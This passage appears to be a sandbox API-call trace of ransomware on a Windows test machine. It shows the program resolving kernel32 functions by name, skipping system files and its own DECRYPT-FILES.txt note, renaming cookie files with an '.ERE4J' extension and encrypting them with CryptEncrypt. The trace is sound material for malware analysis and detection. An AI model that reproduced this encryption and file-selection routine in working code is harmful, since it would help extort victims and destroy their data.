(lpString="CREATESEMAPHOREEXA") returned 18 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.958] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.958] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.958] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.958] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.958] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.958] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.958] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.958] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.958] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.958] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.958] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.959] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.959] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.959] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.959] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.959] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.959] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.959] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.959] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.959] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.959] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.959] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.959] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.959] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.959] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.959] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.959] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.959] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.959] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.959] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.960] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.960] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.960] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.960] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.960] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.960] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.960] lstrlenA (lpString="DELETEATOM") returned 10 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.960] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.960] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.960] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.960] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.960] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.960] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.960] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.960] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.960] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.960] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.960] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.960] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.960] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.961] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.961] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.961] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.961] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.961] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.961] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.961] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.961] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.961] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.961] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.961] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.961] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.961] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.961] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.961] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.961] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.961] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.961] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.961] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.961] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.962] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.962] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.962] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.962] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.962] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.962] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.962] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.962] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.962] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.962] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.962] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.962] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt") returned 106 [0078.962] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J") returned 112 [0078.962] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ERE4J" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.ere4j"), dwFlags=0x0) returned 1 [0078.963] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.964] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.964] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.964] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1dcf9270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x56, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ml314[1].txt", cAlternateFileName="5P0DBF~1.TXT")) returned 1 [0078.964] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.964] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="autorun.inf") returned -1 [0078.964] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="boot.ini") returned -1 [0078.964] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="desktop.ini") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="ntuser.dat") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="iconcache.db") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="bootsect.bak") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="ntuser.dat.log") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="thumbs.db") returned -1 [0078.965] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="Bootfont.bin") returned -1 [0078.965] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ml314[1].txt") returned 33 [0078.965] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.965] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.965] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.965] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.965] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.965] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ml314[1].txt") returned 33 [0078.965] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.965] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@ml314[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" [0078.965] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.966] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=86) returned 1 [0078.966] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.966] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.966] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.966] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.966] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.968] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.968] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.968] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.968] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.969] CloseHandle (hObject=0x45c) returned 1 [0078.969] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.969] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.970] CloseHandle (hObject=0x0) returned 0 [0078.970] CloseHandle (hObject=0x458) returned 1 [0078.970] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.971] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.971] GetTickCount () returned 0x114c3cc [0078.971] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.971] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.971] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.971] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.972] lstrlenA (lpString="kernel32.dll") returned 12 [0078.972] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.972] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.972] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.972] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.972] lstrlenA (lpString="ADDATOMA") returned 8 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.972] lstrlenA (lpString="ADDATOMW") returned 8 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.972] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.972] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.972] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.972] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.972] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.972] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.972] lstrcpyA 